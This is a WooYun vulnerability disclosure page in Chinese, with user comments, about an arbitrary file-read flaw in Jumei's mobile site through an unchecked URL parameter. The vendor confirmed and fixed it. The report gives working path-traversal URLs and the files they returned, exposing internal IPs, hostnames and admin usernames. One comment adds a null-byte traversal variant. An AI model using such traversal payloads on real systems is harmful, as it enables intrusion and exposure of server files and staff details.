当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115874

漏洞标题:聚美优品web安全测试之核心站点任意文件读取+包含可getshell-3

相关厂商:聚美优品

漏洞作者: 爱上平顶山

提交时间:2015-05-24 13:43

修复时间:2015-05-24 14:19

公开时间:2015-05-24 14:19

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-24: 厂商已经确认,细节仅向厂商公开
2015-05-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

20rank呢~ 木JJ的家伙们

详细说明:

核心站点任意文件读取
http://m.jumei.com/
http://m.staging.jumei.com/
request_delegate?url= 控制不严

00.jpg


0.jpg


1.jpg


2.jpg


移动端 m.jumei.com的:

3.jpg


4.jpg


http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/hosts
127.0.0.1		localhost		aio.ws.reemake.com
10.0.80.1		debian
::1		ip6-localhost		ip6-loopback
fe00::0		ip6-localnet
ff00::0		ip6-mcastprefix
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
10.0.212.65		ll-000212065-api1.mob.prod.bj1
http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/group
root:x:0:
jumeiops:x:10001:
jumeiplat:x:10002:
jumeidev:x:10003:
jumeidba:x:10004:
jumeisec:x:10005:
jumeiadmin:x:20000:weibinf,qih1,dongdongf2,mengmengc,hanz,xiw4
jumeiqa:x:10006:
zabbix:x:107:
nagios:x:108:
logs:x:998:
.
..
...


ok
不给20rank木JJ..

漏洞证明:

··

修复方案:

xx

版权声明:转载请注明来源 爱上平顶山@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-24 13:48

厂商回复:

这个洞很不错,感谢!

最新状态:

2015-05-24:先补了,多谢!

漏洞评价:

评论

  1. 2015-05-24 13:47 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    我就知道有第3发

  2. 2015-05-24 20:46 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    说好的getshell呢?

  3. 2015-05-25 01:10 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    说好的getshell呢?

  4. 2015-05-25 09:10 | hack_lan ( 路人 | Rank:4 漏洞数:3 | 爱好linux开源架构,安全,python)

    说好的getshell呢?

  5. 2015-05-25 09:36 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒莲湖夜雨八年灯)

    说好的getshell呢?

  6. 2015-05-25 09:55 | Sura、Rain ( 路人 | Rank:15 漏洞数:8 | 关注Java WEB安全)

    读文件就拿20rank,脸皮真厚

  7. 2015-05-25 12:09 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    说好的getshell呢?

  8. 2015-05-25 15:38 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    包含呢,像这种漏洞我只敢拿10rank

  9. 2015-05-25 16:44 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    说好的getshell呢?

  10. 2015-05-25 23:51 | 九零奶嘴 ( 路人 | Rank:8 漏洞数:4 | 小菜比)

    说好的getshell呢?

  11. 2015-05-27 15:25 | huoge ( 实习白帽子 | Rank:89 漏洞数:21 | 懂点安全)

    这种怎么个修复法?是代码问题吗?

  12. 2015-05-28 10:01 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    说好的getshell呢?

  13. 2015-05-28 21:59 | 小指头 ( 实习白帽子 | Rank:97 漏洞数:19 | 不想当大拇指的小指头,不是个好手。)

    get新技能--可getshell

  14. 2015-05-31 22:35 | Ska ( 路人 | Rank:15 漏洞数:2 )

    说好的Getshell呢,求披露细节,难道不只是包含?

  15. 2015-05-31 22:39 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @Ska 机智,大概是细节太敏感让和谐了

  16. 2015-07-22 19:53 | 张三 ( 路人 | Rank:2 漏洞数:3 | 张三)

    http://m.jumei.com/i/MobileWap/request_delegate?url=..\.\123.jpg%00??